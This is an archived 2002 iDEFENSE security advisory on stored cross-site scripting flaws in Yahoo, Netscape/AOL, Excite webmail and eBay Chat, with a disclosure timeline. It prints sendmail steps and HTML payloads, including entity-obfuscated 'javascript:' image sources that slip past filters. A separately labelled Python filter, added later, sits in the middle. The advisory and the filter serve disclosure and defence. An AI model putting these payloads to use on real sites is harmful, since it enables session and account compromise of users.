Message-ID: <3D60AED5.1818.242E38F7@localhost>
From: dendler at idefense.com (David Endler)
Subject: iDEFENSE Security Advisory: Cross-Site Scripting Vulnerabilities in Popular Web Applications

iDEFENSE Security Advisory 08.19.2002
Cross-Site Scripting (XSS) Vulnerabilities in Popular Web Applications

Yahoo Mail	http://mail.yahoo.com
Netscape Mail	http://webmail.netscape.com
AOL Webmail	http://webmail.aol.com (same as Netscape Mail)
Excite Mail	http://mail.excite.com
eBay Chat 	http://pages.ebay.com/community/chat/index.html


DESCRIPTION 

Many Web Applications generate dynamic HTML web pages using 
user-submitted data and other sources of "untrusted content." 
Web Applications that do not meticulously filter this untrusted 
content before presenting the web page to the user may allow 
an attacker to manipulate the web page and the way a web 
browser interprets its content.

This issue becomes dangerous when untrusted content can be 
inserted into a dynamic HTML web page via a web application 
or other means, causing the content to execute potentially 
malicious code within a user's browser with exactly the same 
privileges as the legitimate web server.

Some Web Applications, such as Yahoo Mail, already 
meticulously filter incoming untrusted data before the content 
reaches their users. However, given the loose interpretation 
of HTML/JavaScript/VBScript etc. by various web browsers, 
obfuscated content may elude the current filters and execute 
within the user's browser environment.

This allows the attacker to target users almost instantly, 
without relying on the user performing any activity other than 
normal usage. All vulnerabilities affect either Microsoft 
Internet Explorer or Netscape, or both. These types of 
XSS vulnerabilities are usually classified as "constant-state", 
as they exist persistently for more than just one HTTP 
request. More detailed XSS exploitation scenarios 
are described in an iDEFENSE paper available at 
http://www.idefense.com/XSS.html.


ANALYSIS

*** Yahoo Mail ***

The following XSS vulnerability only existed for Netscape 4.x 
browsers (see Vendor Response; this issue in Yahoo has since 
been addressed):

bash$ sendmail -t target@...oo.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@....com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<ILAYER SRC="script.js"></ILAYER>


</BODY></HTML>
.
--------------------------------------------------



*** Netscape/AOL Webmail ***

This XSS vulnerability exists in Netscape Mail 
(webmail.netscape.com) and AOL Webmail (webmail.aol.com).  The 
following XSS behavior can be caused in both IE 5.x/6.x and 
Netscape 4.x:

bash$ sendmail -t target@...scape.net

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@....com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<IMG SRC="javasc&#X0A;ript:alert('test');">

</BODY></HTML>
.
--------------------------------------------------



*** Excite Webmail ***

It would seem that Excite does not perform any filtering of 
HTML/SCRIPT whatsoever.  The following XSS behavior can be 
caused in both IE 5.x/6.x and Netscape 4.x/6.x:

bash$ sendmail -t target@...ite.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@....com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<SCRIPT>alert(document.domain);</SCRIPT>

</BODY></HTML>
.
--------------------------------------------------



*** eBay Chat ***

While you are logged in as an eBay user, place the text string 
below within the chat text field and click submit. The message 
will appear within the main chat text message and will execute 
in a user's browser when read. The following XSS behavior can 
be caused in both IE 5.x/6.x and Netscape 4.x:

---- XSS String ------------------------------------
<IMG SRC="javasc&#X0A;ript:alert(document.domain);">
----------------------------------------------------
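As an added defensive illustration (not part of the iDEFENSE advisory), the check below normalizes URL attribute values, decoding HTML entities and stripping control characters, before testing the scheme; this is what lets a filter catch the entity-encoded newline in the javasc&#X0A;ript: payloads shown above, and the script-capable tag list also covers the ILAYER and SCRIPT payloads. The naive substring check beside it is the kind of filter the advisory says such obfuscation eludes; the tag and attribute lists are this example's assumptions, not the advisory's.

```python
import html
import re

# Characters a browser of the era ignored inside a URL scheme; the advisory's
# payload hides a newline (&#X0A;) in the middle of "javascript:".
_SCHEME_NOISE = re.compile(r"[\x00-\x20]")

# Opening tags only (so a closing </ILAYER> is not reported twice).
_OPEN_TAG_RE = re.compile(r"<\s*([a-zA-Z][a-zA-Z0-9]*)")

# Attributes that take a URL, with double-quoted, single-quoted or bare values.
_URL_ATTR_RE = re.compile(
    r"""\b(?:src|href|lowsrc)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)

# Assumed lists for this example: tags that load or run script, and schemes
# that execute script when used as an image/link source.
SCRIPT_TAGS = {"script", "ilayer", "layer", "iframe", "object", "embed"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:")


def normalize_url(value: str) -> str:
    """Decode entities (html.unescape accepts &#X0A; with a capital X), decode
    again to defeat double-encoding, then drop whitespace/control characters."""
    decoded = html.unescape(html.unescape(value))
    return _SCHEME_NOISE.sub("", decoded).lower()


def naive_filter_flags(markup: str) -> bool:
    """Plain substring check: the sort of filter obfuscated payloads slip past."""
    lowered = markup.lower()
    return "javascript:" in lowered or "<script" in lowered


def find_xss(markup: str) -> list:
    """Return the reasons this markup should be rejected; empty means none found."""
    reasons = []
    for m in _OPEN_TAG_RE.finditer(markup):
        tag = m.group(1).lower()
        if tag in SCRIPT_TAGS:
            reasons.append(f"script-capable tag <{tag}>")
    for m in _URL_ATTR_RE.finditer(markup):
        raw = next(g for g in m.groups() if g is not None)
        if normalize_url(raw).startswith(SCRIPT_SCHEMES):
            reasons.append(f"script scheme in URL attribute: {raw!r}")
    return reasons


if __name__ == "__main__":
    # Constructed input mirroring the advisory's eBay/Netscape payload shape.
    sample = '<IMG SRC="javasc&#X0A;ript:alert(document.domain);">'
    print("naive filter flags it:", naive_filter_flags(sample))  # False
    print("normalized check:", find_xss(sample))
```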



DISCOVERY CREDIT

Jeremiah Grossman (jeremiah@...tehatsec.com)
Lex Arquette (lex@...tehatsec.com)


VENDOR RESPONSE

July 16, 2002 - Scott Renfro (scottr@...oo-inc.com), title 
"Paranoid Yahoo", responded and issue was fixed.


DISCLOSURE TIMELINE

June 27, 2002		Exclusively Disclosed to iDEFENSE
July 16, 2002		eBay, AOL/Netscape, Yahoo, and Excite notified
July 16, 2002		iDEFENSE Client Disclosure
August 11, 2002		Second notice given to Excite, AOL/Netscape, and eBay through web customer service suggestion systems
August 19, 2002		Still no response from Excite, AOL/Netscape, or eBay - Public Disclosure




http://www.idefense.com/contributor.html

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendler@...fense.com
www.idefense.com


